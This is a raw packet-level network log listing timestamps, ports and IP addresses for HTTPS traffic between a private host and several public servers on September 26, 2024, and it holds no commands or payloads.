Sep 26, 2024 17:55:26.723692894 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.723923922 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.723957062 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.723988056 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.724003077 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.724009991 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.724067926 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.726360083 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.726402998 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.726432085 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.726457119 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.726464987 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.726584911 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.726593018 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.726638079 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.726648092 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.726655006 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.726742029 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.726749897 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.727124929 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.727163076 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.727195024 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.727225065 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.727229118 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.727236986 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.727279902 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.727279902 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.727658987 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.727720022 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.728029013 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.728068113 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.728101015 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.728131056 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.728131056 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.728131056 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.728163004 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.728192091 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.728595018 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.728634119 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.728667974 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.728669882 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.728683949 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.728727102 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.728750944 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.728758097 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.728785992 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.729501963 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.729537010 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.729572058 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.729604959 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.729605913 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.729618073 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.729649067 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.729681015 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.729697943 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.729707003 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.729747057 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.729779005 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.729799032 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.729805946 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.729825020 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.730365038 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.730406046 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.730439901 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.730472088 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.730487108 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.730498075 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.730510950 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.730540991 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.730665922 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.730680943 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.731206894 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.739252090 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.739368916 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.739423037 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.739461899 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.739463091 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.739484072 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.739543915 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.739551067 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.739630938 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.750952959 CEST	49689	80	192.168.2.16	192.229.211.108
Sep 26, 2024 17:55:26.760936022 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.761051893 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.761094093 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.761123896 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.761198997 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.761219978 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.766819000 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.766850948 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.766918898 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.766927958 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.767079115 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.767108917 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.767132044 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.767138958 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.767174006 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.767497063 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.767529011 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.767601013 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.767606020 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.767654896 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.767754078 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.767760038 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.768039942 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.768044949 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.777235031 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.777282953 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.777476072 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.777482986 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.777489901 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.777537107 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.777539015 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.777548075 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.777597904 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.777888060 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.777942896 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.777949095 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.777957916 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.778008938 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.778014898 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.778357983 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.778464079 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.778470039 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.784113884 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.784274101 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.784320116 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.784333944 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.784339905 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.784373999 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.784374952 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.786530018 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:26.786792994 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:26.786808014 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:26.787285089 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:26.787367105 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.787373066 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.787862062 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:26.787940025 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:26.788209915 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:26.788239002 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:26.813836098 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.813863993 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.814076900 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.814094067 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.814100981 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.814133883 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.814445019 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.814481020 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.814513922 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.814532042 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.814536095 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.814570904 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.814594030 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.814599991 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.814616919 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.815073013 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.815197945 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.815203905 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.817110062 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.817145109 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.817193031 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.817199945 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.817354918 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.817447901 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.817507982 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.817538023 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.817565918 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.817620039 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.817620039 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.817627907 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.817890882 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.817922115 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.817945004 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.817951918 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.818167925 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.818197966 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.818224907 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.818244934 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.818244934 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.818253040 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.818408012 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.818505049 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.818521976 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:26.818567038 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.818597078 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.818837881 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:26.818845987 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.818852901 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.818859100 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:26.818936110 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.818941116 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.819008112 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.819039106 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.819073915 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.819114923 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.819120884 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.819120884 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.819127083 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.819185019 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.819190979 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.819675922 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.819715977 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.819747925 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.819758892 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.819763899 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.819802046 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.819813967 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.819833994 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.819854975 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.819859982 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.819889069 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.819895983 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:26.819936991 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.819952011 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:26.819962978 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.819973946 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:26.820472956 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.820513964 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.820544958 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:26.820569038 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.820576906 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:26.820597887 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.820622921 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.820627928 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.820632935 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.820748091 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.820913076 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.820935011 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:26.820998907 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:26.821470022 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:26.821485996 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:26.821511030 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.821767092 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:26.821849108 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:26.824274063 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:26.824356079 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:26.825088024 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:26.825205088 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:26.825217962 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:26.825263977 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:26.829756021 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.829827070 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.830002069 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.830117941 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.830126047 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.830203056 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.830207109 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.852757931 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.852813959 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.852842093 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.852850914 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.852876902 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.852904081 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.853080034 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.853110075 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.853252888 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.853260040 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.853322029 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.860326052 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.860502958 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.860538006 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.860569000 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.860634089 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.860634089 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.860645056 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.860996008 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.861037970 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.861080885 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.861094952 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.861102104 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.861140013 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.861149073 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.861177921 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.861200094 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.861207008 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.861732006 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.871201038 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:26.871205091 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:26.871229887 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:26.882659912 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.882909060 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.882947922 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.882977962 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.882992983 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.882998943 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.883080959 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.883356094 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.883394957 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.883420944 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.883423090 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.883429050 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.883514881 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.883522034 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.883831978 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.883836985 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.891366005 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.891413927 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.891438961 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.891448021 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.891674042 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.891707897 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.891731024 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.891736984 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.891757965 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.919305086 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:26.929644108 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.929699898 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.929765940 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.929779053 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.929841042 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.929867029 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.930027008 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.930197001 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.930227041 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.930262089 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.930279970 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.930293083 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.930535078 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.930568933 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.930584908 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.930603027 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.930612087 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.930643082 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.931005001 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.931449890 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.931479931 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.931513071 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.931533098 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.931546926 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.931591988 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.931643963 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.931653976 CEST	443	49721	172.217.16.132	192.168.2.16
